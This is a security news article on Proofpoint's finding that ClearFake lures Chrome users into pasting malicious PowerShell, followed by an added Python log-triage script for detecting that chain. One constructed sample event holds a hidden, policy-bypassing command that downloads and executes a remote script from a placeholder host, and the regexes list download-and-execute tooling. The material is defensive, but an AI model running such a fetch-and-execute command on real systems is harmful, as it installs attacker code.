Proofpoint uncovers social engineering technique

Proofpoint Inc.

By Dylan Bushell-Embling
Monday, 24 June, 2024


Proofpoint has uncovered a new social engineering technique that attempts to coerce victims into copying and pasting malicious PowerShell scripts, infecting their own computers with malware.

The technique targets users of Google’s popular Chrome web browser. It has been observed since at least 1 March in the ClearFake attack campaign. ClearFake is a fake browser update activity cluster that compromises legitimate websites by injecting malicious HTML and JavaScript into them.

As part of the technique, when a user visits a compromised website, they are presented with a fake warning overlay prompting them to install a ‘root certificate’ in order to properly access the page. The message includes a button that copies code to the user’s clipboard and instructs them to open a PowerShell window, paste the malicious code and run it, Proofpoint said.

In the attack campaign observed by Proofpoint in May, the pasted code performed several actions, including flushing the DNS cache, clearing the clipboard contents, displaying a decoy message to the user, and downloading a remote PowerShell script and executing it in memory.

The remote PowerShell script downloaded another PowerShell script, which queried system temperatures as a check for virtual machines and sandboxes (virtual hardware typically reports none). If no virtualisation was detected, it downloaded a fourth PowerShell script, which in turn fetched a file named data.zip, extracted its contents and searched them for .exe files to run.

This chain was then used to deliver payloads including cryptocurrency miners, as well as a clipboard hijacker designed to replace cryptocurrency wallet addresses in the clipboard with threat actor-controlled addresses.
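The first-stage behaviours described above (a PowerShell launched by the user, hidden window, in-memory execution of a downloaded script, DNS cache flush, clipboard wipe) are a usable detection signature. The following is an added example written for this page, not Proofpoint’s code or the ClearFake script; it scores constructed process-creation log lines (a simplified key=value layout loosely modelled on Sysmon Event ID 1, not real telemetry) against those behaviours, and the indicator weights and threshold are assumptions to be tuned against your own baseline.

```python
"""Heuristic triage for the 'paste this into PowerShell' lure chain.

Added example (not the advisory's code). Log format, sample events, weights
and threshold are all constructed assumptions for illustration.
"""
import re
from dataclasses import dataclass

# Constructed sample events (not real telemetry). Field values are quoted so
# paths with spaces survive parsing.
SAMPLE_EVENTS = [
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell -w hidden -ep bypass -c Clear-DnsClientCache; Set-Clipboard -Value $null; iex (iwr -UseBasicParsing http://example.invalid/a.ps1).Content"',
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\Vendor\backup.exe" CommandLine="powershell -File C:\scripts\nightly.ps1"',
    r'Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="cmd /c dir"',
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell Get-Process"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# (name, weight, pattern): each maps to a behaviour the advisory describes.
# Weights are assumptions; tune them against your environment's baseline.
INDICATORS = [
    ("hidden_window", 2, re.compile(r'-w(?:indowstyle)?\s+hidden', re.I)),
    ("policy_bypass", 1, re.compile(r'-e(?:xecutionpolicy|p)\s+bypass', re.I)),
    ("in_memory_exec", 2, re.compile(r'\b(?:iex|invoke-expression)\b', re.I)),
    ("remote_fetch", 2, re.compile(r'\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b', re.I)),
    ("dns_flush", 1, re.compile(r'clear-dnsclientcache|ipconfig\s+/flushdns', re.I)),
    ("clipboard_wipe", 1, re.compile(r'set-clipboard|clear-clipboard', re.I)),
]
# A shell spawned directly by the desktop shell is user-initiated, which is
# what a copy-paste lure produces; it only adds weight when other hits exist.
INTERACTIVE_PARENTS = {"explorer.exe"}
THRESHOLD = 5  # assumption


@dataclass
class Verdict:
    image: str
    score: int
    hits: list
    flagged: bool


def parse_event(line: str) -> dict:
    """Turn one key="value" log line into a dict."""
    return dict(FIELD_RE.findall(line))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(line: str) -> Verdict:
    ev = parse_event(line)
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    hits, score = [], 0
    # Only PowerShell hosts are in scope for this particular chain.
    if image in ("powershell.exe", "pwsh.exe"):
        for name, weight, pat in INDICATORS:
            if pat.search(cmd):
                hits.append(name)
                score += weight
        if hits and parent in INTERACTIVE_PARENTS:
            hits.append("interactive_parent")
            score += 1
    return Verdict(image, score, hits, score >= THRESHOLD)


def triage(lines) -> list:
    return [score_event(line) for line in lines]


if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        state = "ALERT" if v.flagged else "ok   "
        print(f"{state} score={v.score:2d} {v.image} {','.join(v.hits)}")
```

One caveat worth building into the rule: if the victim pastes into an already-open interactive PowerShell window, the malicious text runs inside that existing process and no new process-creation event carries it, so a command-line rule alone misses it. Pair this with PowerShell script block logging (Event ID 4104), where the same indicators can be matched against the logged script text.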

“The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied and increasingly creative attack chains,” Proofpoint researchers said in a threat advisory. “Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”
